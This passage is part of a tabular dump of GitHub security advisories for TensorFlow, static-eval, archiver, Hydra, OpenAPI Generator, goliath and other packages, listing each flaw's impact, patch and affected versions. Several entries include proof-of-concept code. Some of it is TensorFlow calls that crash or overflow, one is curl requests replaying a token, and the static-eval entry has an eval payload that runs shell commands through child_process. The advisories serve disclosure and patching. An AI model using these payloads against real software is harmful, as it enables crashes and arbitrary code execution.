'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c968-pq7h-7fxv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29522'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/311403edbc9816df80274bd1ea8b3c0c0f22c3fa'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:22:10Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-j7rm-8ww4-xx2g,2021-05-18T17:02:05Z,2021-05-21T14:26:45Z,,['CVE-2021-29587'],Division by zero in TFLite's implementation of `SpaceToDepth`,"### Impact +The `Prepare` step of the `SpaceToDepth` TFLite operator [does not check for 0 before division](https://github.com/tensorflow/tensorflow/blob/5f7975d09eac0f10ed8a17dbb6f5964977725adc/tensorflow/lite/kernels/space_to_depth.cc#L63-L67). + +```cc +const int block_size = params->block_size; +const int input_height = input->dims->data[1]; +const int input_width = input->dims->data[2]; +int output_height = input_height / block_size; +int output_width = input_width / block_size; +``` + +An attacker can craft a model such that `params->block_size` would be zero. + +### Patches +We have patched the issue in GitHub commit [0d45ea1ca641b21b73bcf9c00e0179cda284e7e7](https://github.com/tensorflow/tensorflow/commit/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j7rm-8ww4-xx2g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29587'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:02:05Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-xcwj-wfcm-m23c,2021-05-18T23:03:26Z,2021-05-21T14:22:09Z,,['CVE-2021-29530'],Invalid validation in `SparseMatrixSparseCholesky`,"### Impact +An attacker can trigger a null pointer dereference by providing an invalid `permutation` to `tf.raw_ops.SparseMatrixSparseCholesky`: + +```python +import tensorflow as tf +import numpy as np +from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops + +indices_array = np.array([[0, 0]]) +value_array = np.array([-10.0], dtype=np.float32) +dense_shape = [1, 1] +st = tf.SparseTensor(indices_array, value_array, dense_shape) + +input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( + st.indices, st.values, st.dense_shape) + +permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) + +tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/080f1d9e257589f78b3ffb75debf584168aa6062/tensorflow/core/kernels/sparse/sparse_cholesky_op.cc#L85-L86) fails to properly validate the input arguments: + +```cc +void Compute(OpKernelContext* ctx) final { + ... + const Tensor& input_permutation_indices = ctx->input(1); + ... + ValidateInputs(ctx, *input_matrix, input_permutation_indices, &batch_size, &num_rows); + ... +} + +void ValidateInputs(OpKernelContext* ctx, + const CSRSparseMatrix& sparse_matrix, + const Tensor& permutation_indices, int* batch_size, + int64* num_rows) { + OP_REQUIRES(ctx, sparse_matrix.dtype() == DataTypeToEnum::value, ...) + ... +} +``` +Although `ValidateInputs` is called and there are checks in the body of this function, the code proceeds to the next line in `ValidateInputs` since [`OP_REQUIRES`](https://github.com/tensorflow/tensorflow/blob/080f1d9e257589f78b3ffb75debf584168aa6062/tensorflow/core/framework/op_requires.h#L41-L48) is a macro that only exits the current function. + +```cc +#define OP_REQUIRES(CTX, EXP, STATUS) \ + do { \ + if (!TF_PREDICT_TRUE(EXP)) { \ + CheckNotInComputeAsync((CTX), ""OP_REQUIRES_ASYNC""); \ + (CTX)->CtxFailure(__FILE__, __LINE__, (STATUS)); \ + return; \ + } \ + } while (0) +``` + +Thus, the first validation condition that fails in `ValidateInputs` will cause an early return from that function. However, the caller will continue execution from the next line. The fix is to either explicitly check `context->status()` or to convert `ValidateInputs` to return a `Status`. + +### Patches +We have patched the issue in GitHub commit [e6a7c7cc18c3aaad1ae0872cb0a959f5c923d2bd](https://github.com/tensorflow/tensorflow/commit/e6a7c7cc18c3aaad1ae0872cb0a959f5c923d2bd). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xcwj-wfcm-m23c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29530'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e6a7c7cc18c3aaad1ae0872cb0a959f5c923d2bd'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:03:26Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-8v27-2fg9-7h62,2021-05-06T16:12:57Z,2021-05-06T16:11:25Z,2021-05-04T20:26:20Z,['CVE-2021-23334'],Withdrawn: Arbitrary Code Execution in static-eval,"All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src=""(function (x) { return ${eval(""console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())"")} })()"" var ast = parse(src).body[0].expression; evaluate(ast) + +# WITHDRAWN + +This was deemed not a vulnerability. See [this issue](https://github.com/browserify/static-eval/issues/34) for details.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'static-eval'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23334'}, {'type': 'WEB', 'url': 'https://github.com/browserify/static-eval/blob/master/index.js%23L180'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:01:14Z', 'nvd_published_at': '2021-02-11T12:15:00Z'}" +1.4.0,GHSA-h74j-692g-48mq,2023-09-29T17:04:48Z,2021-05-18T15:31:53Z,,['CVE-2019-10743'],Path Traversal in MHolt Archiver,"All versions of archiver allow attacker to perform a Zip Slip attack via the ""unarchive"" functions. It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a ""../../file.exe"" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily. + +### Specific Go Packages Affected +github.com/mholt/archiver/cmd/arc","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/mholt/archiver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10743'}, {'type': 'WEB', 'url': 'https://github.com/mholt/archiver/pull/169'}, {'type': 'WEB', 'url': 'https://github.com/mholt/archiver/pull/203'}, {'type': 'WEB', 'url': 'https://github.com/mholt/archiver/commit/8217ed3a206c0473b4ec1aff51375b398838073a'}, {'type': 'WEB', 'url': 'https://github.com/snyk/zip-slip-vulnerability'}, {'type': 'WEB', 'url': 'https://snyk.io/research/zip-slip-vulnerability'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMMHOLTARCHIVERCMDARC-174728,'}]","{'cwe_ids': ['CWE-29'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:21:43Z', 'nvd_published_at': None}" +1.4.0,GHSA-pgmg-gf5p-54j8,2023-09-07T00:00:21Z,2021-05-06T18:26:14Z,,['CVE-2020-7718'],Prototype Pollution in gammautils,All versions of package gammautils up to and including version 0.0.81 are vulnerable to Prototype Pollution via the `deepSet` and `deepMerge` functions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gammautils'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.81'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7718'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GAMMAUTILS-598670'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:05:47Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-3p3g-vpw6-4w66,2023-09-29T17:16:04Z,2021-05-27T18:43:22Z,,['CVE-2020-5300'],Authentication Bypass in hydra,"### Impact + +When using client authentication method ""private_key_jwt"" [1], OpenId specification says the following about assertion `jti`: + +> A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties + +Hydra does not seem to check the uniqueness of this `jti` value. Here is me sending the same token request twice, hence with the same `jti` assertion, and getting two access tokens: + +``` +$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \ + --header 'Content-Type: application/x-www-form-urlencoded' \ + --data-urlencode 'grant_type=client_credentials' \ + --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \ + --data-urlencode 'scope=application openid' \ + --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \ + --data-urlencode 'client_assertion=eyJhb [...] jTw' +{""access_token"":""zeG0NoqOtlACl8q5J6A-TIsNegQRRUzqLZaYrQtoBZQ.VR6iUcJQYp3u_j7pwvL7YtPqGhtyQe5OhnBE2KCp5pM"",""expires_in"":3599,""scope"":""application openid"",""token_type"":""bearer""}⏎ ~$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \ + --header 'Content-Type: application/x-www-form-urlencoded' \ + --data-urlencode 'grant_type=client_credentials' \ + --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \ + --data-urlencode 'scope=application openid' \ + --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \ + --data-urlencode 'client_assertion=eyJhb [...] jTw' +{""access_token"":""wOYtgCLxLXlELORrwZlmeiqqMQ4kRzV-STU2_Sollas.mwlQGCZWXN7G2IoegUe1P0Vw5iGoKrkOzOaplhMSjm4"",""expires_in"":3599,""scope"":""application openid"",""token_type"":""bearer""} +``` + +### Severity + +We rate the severity as medium because the following reasons make it hard to replay tokens without the patch: + +- TLS protects against MITM which makes it difficult to intercept valid tokens for replay attacks +- The expiry time of the JWT gives only a short window of opportunity where it could be replayed + +### Patches + +This will be patched with v1.4.0+oryOS.17 + +### Workarounds + +Two workarounds have been identified: + +- Do not allow clients to use `private_key_jwt` +- Use short expiry times for the JWTs + +### References + +https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication + +### Upstream + +This issue will be resolved in the upstream repository https://github.com/ory/fosite","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ory/hydra'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ory/hydra/security/advisories/GHSA-3p3g-vpw6-4w66'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5300'}, {'type': 'WEB', 'url': 'https://github.com/ory/hydra/commit/700d17d3b7d507de1b1d459a7261d6fb2571ebe3'}, {'type': 'PACKAGE', 'url': 'https://github.com/ory/hydra'}, {'type': 'WEB', 'url': 'https://github.com/ory/hydra/releases/tag/v1.4.0'}, {'type': 'WEB', 'url': 'https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication'}]","{'cwe_ids': ['CWE-294'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:19:26Z', 'nvd_published_at': None}" +1.4.0,GHSA-23x4-m842-fmwf,2023-06-30T20:30:26Z,2021-05-11T00:04:40Z,,['CVE-2021-21428'],Creation of Temporary File in Directory with Insecure Permissions in the OpenAPI-Generator online generator,"### Impact + +On Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. + +This vulnerability is local privilege escalation because the contents of the outputFolder can be appended to by an attacker. As such, code written to this directory, when executed can be attacker controlled. + +openapi-generator-online creates insecure temporary folders with `File.createTempFile` during the code generation process. The insecure temporary folders store the auto-generated files which can be read and appended to by any users on the system. + +### Vulnerable Code + +https://github.com/OpenAPITools/openapi-generator/blob/c6530519975341d7784a252132b2f0854f488901/modules/openapi-generator-online/src/main/java/org/openapitools/codegen/online/service/Generator.java#L184-L187 + +This vulnerability exists due to a race condition between the deletion of the randomly generated temporary file and the creation of the temporary directory. + +```java +File outputFolder = File.createTempFile(""codegen-"", ""-tmp""); // Attacker knows the full path of the file that will be generated +// delete the file that was created +outputFolder.delete(); // Attacker sees file is deleted and begins a race to create their own directory before the code generator +// and make a directory of the same name +// SECURITY VULNERABILITY: Race Condition! - Attacker beats the code generator and now owns this directory +outputFolder.mkdir(); +``` + +### Patches +The issue has been patched by changing the underlying logic to use `Files.createTempFile` and has been released in the v5.1.0 stable version. + +This vulnerability has the same root cause as CVE-2021-21363 from the `swagger-api/swagger-codegen` project as this project and that one both share the same original source tree. +See: https://github.com/swagger-api/swagger-codegen/security/advisories/GHSA-pc22-3g76-gm6j + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [OpenAPI Generator Github repo](https://github.com/openAPITools/openapi-generator/) +* Email us at [security@openapitools.org](mailto:security@openapitools.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.openapitools:openapi-generator-online'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/security/advisories/GHSA-23x4-m842-fmwf'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-codegen/security/advisories/GHSA-pc22-3g76-gm6j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21428'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/pull/8788'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenAPITools/openapi-generator'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/blob/c6530519975341d7784a252132b2f0854f488901/modules/openapi-generator-online/src/main/java/org/openapitools/codegen/online/service/Generator.java#L184-L187'}]","{'cwe_ids': ['CWE-269', 'CWE-377', 'CWE-378', 'CWE-379', 'CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-10T18:52:04Z', 'nvd_published_at': '2021-05-10T19:15:00Z'}" +1.4.0,GHSA-79fv-9865-4qcv,2021-05-18T18:02:34Z,2021-05-21T14:26:23Z,,['CVE-2021-29579'],Heap buffer overflow in `MaxPoolGrad`,"### Impact +The implementation of `tf.raw_ops.MaxPoolGrad` is vulnerable to a heap buffer overflow: + +```python +import tensorflow as tf + +orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) +orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) +grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) +ksize = [1, 1, 1, 1] +strides = [1, 1, 1, 1] +padding = ""SAME"" + +tf.raw_ops.MaxPoolGrad( + orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, + strides=strides, padding=padding, explicit_paddings=[]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/ab1e644b48c82cb71493f4362b4dd38f4577a1cf/tensorflow/core/kernels/maxpooling_op.cc#L194-L203) fails to validate that indices used to access elements of input/output arrays are valid: + +```cc +for (int index = out_start; index < out_end; ++index) { + int input_backprop_index = out_arg_max_flat(index); + FastBoundsCheck(input_backprop_index - in_start, in_end - in_start); + input_backprop_flat(input_backprop_index) += out_backprop_flat(index); +} +``` + +Whereas accesses to `input_backprop_flat` are guarded by `FastBoundsCheck`, the indexing in `out_backprop_flat` can result in OOB access. + +### Patches +We have patched the issue in GitHub commit [a74768f8e4efbda4def9f16ee7e13cf3922ac5f7](https://github.com/tensorflow/tensorflow/commit/a74768f8e4efbda4def9f16ee7e13cf3922ac5f7). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-79fv-9865-4qcv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29579'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a74768f8e4efbda4def9f16ee7e13cf3922ac5f7'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:02:34Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-3892-2r52-p65m,2023-01-25T22:49:54Z,2021-05-24T18:20:07Z,,['CVE-2020-7671'],HTTP Request Smuggling in goliath,"goliath through 1.0.6 allows request smuggling attacks where goliath is used as a backend and a frontend proxy also being vulnerable. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TE:CL smuggling attacks.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'goliath'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7671'}, {'type': 'WEB', 'url': 'https://github.com/postrank-labs/goliath/issues/351'}, {'type': 'PACKAGE', 'url': 'https://github.com/postrank-labs/goliath'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-RUBY-GOLIATH-569136'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T17:20:47Z', 'nvd_published_at': '2020-06-10T16:15:00Z'}" +1.4.0,GHSA-vh5w-fg69-rc8m,2021-05-06T20:57:55Z,2021-05-07T16:06:34Z,,['CVE-2020-8910'],Improper Input Validation in Google Closure Library,A URL parsing issue in goog.uri of the Google Closure Library versions up to and including v20200224 allows an attacker to send malicious URLs to be parsed by the library and return the wrong authority. Mitigation -- update your library to version v20200315.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'google-closure-library'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20200315.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 20200224.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8910'}, {'type': 'WEB', 'url': 'https://github.com/google/closure-library/commit/294fc00b01d248419d8f8de37580adf2a0024fc9'}, {'type': 'WEB', 'url': 'https://github.com/google/closure-library/releases/tag/v20200315'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T20:57:55Z', 'nvd_published_at': '2020-03-26T12:15:00Z'}" +1.4.0,GHSA-v2jv-33gh-xx29,2022-07-05T18:00:39Z,2021-05-07T16:06:23Z,,['CVE-2021-23374'],Command Injection in ps-visitor,"This affects all versions up to and including version 0.0.2 of package ps-visitor. If attacker-controlled user input is given to the kill function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ps-visitor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23374'}, {'type': 'PACKAGE', 'url': 'https://github.com/WisdomKwan/ps-visitor'}, {'type': 'WEB', 'url': 